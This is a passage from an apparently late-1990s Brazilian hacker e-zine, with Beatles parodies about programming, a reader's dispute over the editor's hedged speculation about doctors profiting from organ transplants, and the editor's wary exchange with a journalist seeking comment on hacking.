4) Último. Quem é fussador, acaba descobrindo sozinho.

Aqueles em outros estados que quiserem que eu divulgue encontros (detalhe: de preferência a moçada que já faz encontros 2600) me avisem.

Se os Beatles fossem programadores (contribuição da lista de piadas)

     YESTERDAY       Yesterday,       All those backups seemed a waste of pay.       Now my database has gone away.       Oh I believe in yesterday.       Suddenly,       There's not half the files there used to be,       And there's a milestone       hanging over me       The system crashed so suddenly.       I pushed something wrong       What it was I could not say.       Now all my data's gone       and I long for yesterday-ay-ay-ay.       Yesterday,       The need for back-ups seemed so far away.       I knew my data was all here to stay,       Now I believe in yesterday.       ============================================       Songs to program by...              Eleanor Rigby             -------------       Eleanor Rigby       Sits at the keyboard       And waits for a line on the screen       Lives in a dream       Waits for a signal       Finding some code       That will make the machine do some more.       What is it for?       All the lonely users, where do they all come from?       All the lonely users, why does it take so long?       Guru MacKenzie       Typing the lines of a program that no one will run;       Isn't it fun?       Look at him working,       Munching some chips as he waits for the code to compile;       It takes  a while...       All the lonely users, where do they all come from?       All the lonely users, why does it take so long?       Eleanor Rigby       Crashes the system and loses 6 hours of work;       Feels like a jerk.       Guru MacKenzie       Wiping the crumbs off the keys as he types in the code;       Nothing will load.       All the lonely users, where do they all come from?       All the lonely users, why does it take so long?        ===================================             Unix Man (Nowhere Man)             --------       He's a real UNIX Man       Sitting in his UNIX LAN       Making all his UNIX plans       For nobody.       Knows the blocksize from du(1)       Cares not where /dev/null goes to       Isn't he a bit like you       And me?       UNIX Man, please listen(2)       My lpd(8) is missin'       UNIX Man       The wo-o-o-orld is at(1) your command.       He's as wise as he can be       Uses lex and yacc and C       UNIX Man, can you help me At all?       UNIX Man, don't worry       Test with time(1), don't hurry       UNIX Man       The new kernel boots, just like you had planned.       He's a real UNIX Man       Sitting in his UNIX LAN       Making all his UNIX  plans For nobody ...       Making all his UNIX  plans For nobody.        ==================================              Something             ---------       Something in the way it fails,       Defies the algorithm's logic!       Something in the way it coredumps...       I don't want to leave it now       I'll fix this problem somehow       Somewhere in the memory I know,       A pointer's got to be corrupted.       Stepping in the debugger will show me...       I don't want to leave it now       I'm too close to leave it now       You're asking me can this code go?       I don't know, I don't know...       What sequence causes it to blow?       I don't know, I don't know...       Something in the initializing code?       And all I have to do is think of it!       Something in the listing will show me...       I don't want to leave it now       I'll fix this tonight I vow! 

CORREIO ELETRÔNICO:

Subject: Criticas

Li sua materia, e esta e uma parte dela:

"Do jeito que esta a situagco i atualmente, i (ou vai ser) um perigo entrar em coma num hospital qualquer. Sua carteira de identidade nco fala que vocj faz parte daqueles que acreditam em "doar" seus orgcos. Midico pensa: "vai custar X manter o cara vivo, mas fulano na fila precisando de um rim vai me dar Y se o cara morrer". I lei. O fato de que o midico dispts de seus orgcos possivelmente receber uma propina (nco sei se a classe midica ganha pouco a ponto de pensar que vale a pena declarar a morte cerebral de alguim para receber uma grana, isso i fruto da minha imaginagco) nco conta muito diante do fato de que existe uma lei permitindo lances relativos."

Infelizmente, nao concordo com vc. O que vc escreveu ai em cima e muito comprometedor. Uma denuncia dessas pode te causar muito problemas, com certeza desnecessarios. Nao sou medico, fique tranquilo.

[..]

O caso do medico ai em cima e um deles. Vc vive defendendo a classe hacker. Eu concordo. Mas, com uma materia dessas, vc nivel uma classe profissional das mais exigidas senao a maior, como a imprensa faz quando aquele adolescente poe fotos de sacanagem na pagina da Scottlan Yard. Ou quebra a senha de uma cartao de credito de um terceiro. E olha que sao fatos menores.

Nao vou dizer que nao existem erros. Pelo contrario, erros existem aos montes. Muitos sao prejudiciais, sim. Mas nao posso concordar que seja perigo entrar em coma em um hospital. A menos que existam crimes. E crimes contra a vida, os maiores de todos. A identidade diz se a pessoa e doadora ou nao. Violando isso, 1 crime. Deixando a pessoa morrer, 2 crimes. Assassinato e quebra de juramento. A familia permitindo a aceitar propina, o maior de todos, a sovinice, a ganancia. Ja tive familiares que lutaram ate o fim pela vida de seus parentes. E, nao posso negar que muitos medicos salvaram vidas, e se nao o conseguiram, tentaram ate o fim. Sou prova viva disto.

[..]

Um grando abraco e espero poder me comunicar melhor com vc.

Fabiano B???

Resposta:

Bom, como dizia Jack (o estripador):  "vamos por partes".  Na maior parte do texto eu não acusei, eu sugeri a hipótese. Mesmo que a classe médica resolvesse me processar nesse caso específico por calúnia e difamação, ia ser interessante. Porque não sou o único que aventou essa hipótese. Tem gente muito mais capacitada do que eu.. Inclusive teve uma matéria na revista "Caros Amigos" (no 6, setembro 97)- uma entrevista com o autor do livro "Mercado Humano - estudo bioético da compra e venda  de partes do corpo",  Volnei Garrafa Giovanni Berlinguer. Um dos entrevistadores, George Bourdokan relatou ter feito 1 programa Globo-Repórter em 1980 sobre roubo de órgãos em Botucatu, onde 1 moça acordou 1 mês depois sem as córneas. O programa não teria ido ao ar por ser "muito pesado". Eu já respondi essa carta em separado, mas se alguém mais ficou curioso por essa questão, vai aí o fato de que não tirei essa hipótese da minha cabeça, nem é ficção científica. Em vários casos, a prática da medicina "pode" ser um crime que compensa. Um exemplo muito pior e que nunca parei pra averiguar é que vários casos de internação na UTI são desnecessários: o paciente vai morrer mesmo e pra tirar alguma grana da família, os médicos falam que o caso ainda tem chance de recuperação. A assistente de enfermagem ou instrumentadora (sei lá, faz tanto tempo) que me falou isso, disse que o pessoal chama a sala pra esses casos desenganados de "antecâmara do inferno". Entre eles, o pessoal do hospital. Claro que isso veio de alguém que saiu da profissão, pode ser mentira ou caso isolado. Essa menina também me falou que em nenhum hospital particular, se você perguntar na recepção, médicos, etc.. existe uma sala para os desenganados. Claro, o paciente desenganado não precisa de UTI ou tratamentos caros que dão lucro pro hospital. Porque o Brasil é um dos campeões de cesarianas? Vaidade? Não só isso, a cesaria é mais cara do que parto natural. Também já ouvi falar de várias lendas urbanas onde a moral é a mesma: o médico ganha mais para amputar até o joelho, do que só o pé... Ouvi isso de diferentes classes sociais. Pode ser lenda. Mas já vi na revista VEJA inclusive, reportagens sobre "erros médicos" envolvendo transplantes. Houve um escândalo internacional envolvendo esterilização forçada de doentes mentais na Suécia. A China estaria vendendo órgãos de prisioneiros políticos executados.  Se lá fazem monstruosidades desse tipo, em países do primeiro e do terceiro  mundo, será que não fazem aqui?

CARTA DA GRANDE IMPRENSA  Subject: Re: Segurança e hacking na Internet  D????? H?????? wrote: >=20 > Caro Derneval, >=20 > Sou um repórter do Caderno de Informárica da ????? de S.P. e estou > trabalhando em uma matéria sobre segurança e hackers (sem nenhuma > conotação pejorativa) na Internet. Acho que seria interessante > desmistificar para o usuário "newbie", ou "wannabe", ou simplismente > doméstico, o mundo do hacking na rede. Gostaria de poder trocar > informações com você sobre o assunto. Caso isso não seja possível, > responda-me o quanto antes. A reportagem será capa da edição do dia ?? > de ???????mbro. >=20 > Se você concordar, ficaria grato se você respondesse às seguintes > perguntas: >=20 > 1. Para você o que são e quais as principais diferenças entre hackers e > crackers? Seus perfis, ética e "modus operandi": >=20 > 2. Do que um hacker (ou cracker) é capaz? Você acha que sua capacid= ade é > superestimada? Ou é a segurança das Intranets que é superestimada? As > empresas estão preparadas? Os firewalls são uma blindagem eficiente? >=20 > 3. Quais as formas básicas de invasão? Telef=F4nica, via Internet, = física, > por meio da "engenharia social" etc...? >=20 > 4. Qual a melhor segurança para o usuário doméstico? >=20 > 5. Do que um hacker (ou cracker precisa)? Equipamento básico, de hard e > soft, conhecimento de linguagens sistemas etc... >=20 > 6. Quais são os alvos mais vulneráveis? E os mais procurados? >=20 > Se você não tiver tempo, ou paciência, para me responder através de > e-mail, seria possível conversarmos pelo telefone para que eu obtivesse > uma declaração de sua parte? Ficaria muito grato pela colaboração. Você > deve saber como é difícil conseguir um pronunciamento de qualquer um dos > lados dessa questão. >=20 > Agradeço, >=20 > D???? H?????? > (repórter free-lancer >  da ??????de ?. ?.)    

RESPOSTA: Esta primeira carta dá uma idéia de quais são as intenções  da chamada "grande imprensa" em relação ao assunto "HACKERS". Claro que a resposta foi negativa, seguida da explicação de que apenas  escrevo sobre o assunto. E "hacking" pra mim é explorar ao máximo os recursos do computador. Esse tipo de coisa. Aí veio a segunda  carta. E com acentos, de novo (esse pessoal não aprende.. não se usa acentuação nem cedilha na internet). Ah, sim, e não foi a única  que recebi.  Vai abaixo o meu REPLY para o segundo convite para discutir o assunto:  Subject: Sua reportagem  >           Caro Derneval, >  >           Entendo a sua relutância em colaborar com a minha reportagem ante a >           abordagem pejorativa do hacking e a sua trajetória -para falar a verdade >           eu não esperava que você sequer me respondesse com a ojeriza que >           qualquer um do meio sente com jornalistas "fuçando" o tema hacking (você   Eu nao tenho condicoes de saber o que voce sentiu lendo o meu email. Mas como pintou uma reportagem sobre "contra-ataque dos crackers" ate' entendo sua  argumentacao.    >           vê a relação?). Contudo acho que você também deveria tentar ver as >           coisas de onde estou... >  >           Serei sincero ("quid pro quo", compreende?): sou um estudante de >           ???????? de ?? anos que estou trabalhando há cinco meses como >           free-lancer do Caderno ????????? d? ????????? e não sou nenhum graúdo >           de rabo preso com o establishment corporativo. Não mantenho nenhum  ???????? (vou te chamar desse jeito, nao sou bom para nomes), Voce tem ?? anos a menos do que eu. Eu nunca te vi. Nao tenho razoes para te odiar como pessoa. So' que, da mesma forma que foi relatado no artigo la' da revista ????????, eu adquiri uma relutancia para conversar com qualquer um do meio jornalistico. Pelo simples fato de que houve um numero de reportagens sobre o assunto e a grande maioria esmagadora foi de reportagens detonando com a imagem, para que eu vou assumir riscos? Algumas das reportagens que detonaram, como "Confidências de um Cracker", teve gente me contatando antes. O editor passou para out